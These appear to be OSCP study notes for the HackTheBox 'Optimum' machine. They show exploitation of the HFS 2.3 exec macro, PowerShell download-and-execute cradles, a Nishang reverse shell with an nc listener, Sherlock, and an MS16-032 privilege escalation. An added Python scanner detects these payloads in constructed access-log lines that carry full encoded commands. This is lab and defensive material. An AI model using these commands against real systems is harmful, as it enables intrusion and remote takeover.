OSCP Notes
HTB Optimum Write-up (Windows) - Powershell Download String, HFS File Server 2.3 Vuln, Sherlock

What I learned:

  • 1-liner to download a remote script and run it in memory:
IEX(New-Object Net.WebClient).downloadString('')
HTTP Enum:
HttpFileServer 2.3
Searchsploit result:
This exploit worked, but IppSec's walkthrough video does it in a better way.
The HFS file server uses rejetto's macro scripting language:
HFS: scripting commands - rejetto wiki
Version 2.3 is vulnerable to remote code execution.
We can execute a command with the following syntax, according to the wiki page:
exec | A
ask system to run file A, eventually with parameters. If you need to use the pipe, then use macro quoting.
Optional parameter out will let you capture the console output of the program in the variable specified by name.
Optional parameter timeout will specify the max number of seconds the app should be left running.
Example: {.exec|notepad.}
We can confirm this by typing: {.exec|ping IP_ADDRESS}
and setting up tcpdump to catch the ICMP traffic the ping generates, which proves the command ran (NEW):
tcpdump -i tun0
Seeing the echo requests arrive shows that it is exploitable.
Windows has 32-bit and 64-bit versions. For the file system paths:
  1.
  2. c:\Windows\SysWow64 -> this is still 32-bit
  3. C:\Windows\SysNative -> this is 64-bit
So we will try the 64-bit one.
Once confirmed, we can use a toolset called "Nishang" > Shells > Invoke-PowerShellTcp.ps1 and copy it somewhere else, as we need to modify it a bit.
At the end of the script, we need to add one line:
Invoke-PowerShellTcp -Reverse -IPAddress -Port 4444
And run nc listening on the port specified.
Finally, we make the file server download and run the script by typing (URL-encoded) into the search box:{.exec|c:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe%20IEX(New-Object%20Net.WebClient).downloadString(%27http://}
And now we get the user shell!
The same method can be used to download priv esc scripts.
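On the defensive side, every one of these requests lands in the web server's access log. An added example, not part of these notes, that decodes constructed Common Log Format lines and flags HFS macro syntax (the exec macro in particular) and the PowerShell download cradle used above; the IPs, paths and log format are made up for illustration:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2020:10:00:00 +0000] "GET /?search=%7B.exec%7Cping%2010.10.14.5.%7D HTTP/1.1" 200 1234
10.10.14.5 - - [01/Jan/2020:10:00:05 +0000] "GET /?search=%7B.exec%7Cc%3A%5CWindows%5CSysNative%5CWindowsPowerShell%5Cv1.0%5Cpowershell.exe%20IEX(New-Object%20Net.WebClient).downloadString(%27http%3A%2F%2F10.10.14.5%2Fshell.ps1%27)%7D HTTP/1.1" 200 1234
10.10.10.1 - - [01/Jan/2020:10:00:10 +0000] "GET /?search=report.pdf HTTP/1.1" 200 987
10.10.10.2 - - [01/Jan/2020:10:00:11 +0000] "GET /docs/{.exec|notepad.} HTTP/1.1" 200 10
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (?P<target>\S+) HTTP/')
# HFS macro syntax is {.name|args.}; exec is the one that runs a program.
MACRO_RE = re.compile(r'\{\.\s*(?P<name>[a-z_]+)\b', re.IGNORECASE)
# The in-memory download cradle from the notes: IEX + WebClient.DownloadString.
CRADLE_RE = re.compile(r'iex.*downloadstring|downloadstring.*iex', re.IGNORECASE | re.DOTALL)


def inspect_line(line):
    """Return the list of tags a single log line triggers (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    # Decode twice: double-encoded requests would otherwise slip past the regexes.
    target = unquote(unquote(m.group("target")))
    tags = []
    names = [n.lower() for n in MACRO_RE.findall(target)]
    if names:
        tags.append("hfs_macro")
    if "exec" in names:
        tags.append("exec_macro")
    if CRADLE_RE.search(target):
        tags.append("ps_download_cradle")
    return tags


def scan_log(text):
    """Return (line_no, source_ip, tags) for every line that raised a tag."""
    hits = []
    for no, line in enumerate(text.splitlines(), 1):
        tags = inspect_line(line)
        if tags:
            hits.append((no, line.split()[0], tags))
    return hits


if __name__ == "__main__":
    for no, ip, tags in scan_log(SAMPLE_LOG):
        print(f"line {no} from {ip}: {', '.join(tags)}")
```

Any hit on the search parameter is worth an alert on its own, since legitimate searches never contain the `{.` macro opener; the cradle tag just tells you how far the request got.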
Priv Esc
Since we are already running PowerShell on the server, let's use Sherlock, a PowerShell script that checks for missing patches.
Edit the Sherlock script and add the function we want to call at the end of the script:
In this case, Find-AllVulns
IEX(New-Object Net.WebClient).downloadString('')
Sherlock reports it is vulnerable to 3 exploits!
  • MS16-032, MS16-034, MS16-135
Try MS16-032.
At the end of the exploit script, add:
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('')"
Transfer the Nishang TCP reverse shell .ps1 script to the same directory, edit its port to something other than the one used last time, and start the Python HTTP server to host both files:
IEX(New-Object Net.WebClient).downloadString('')
Start the nc listener on that port before running it.
It worked!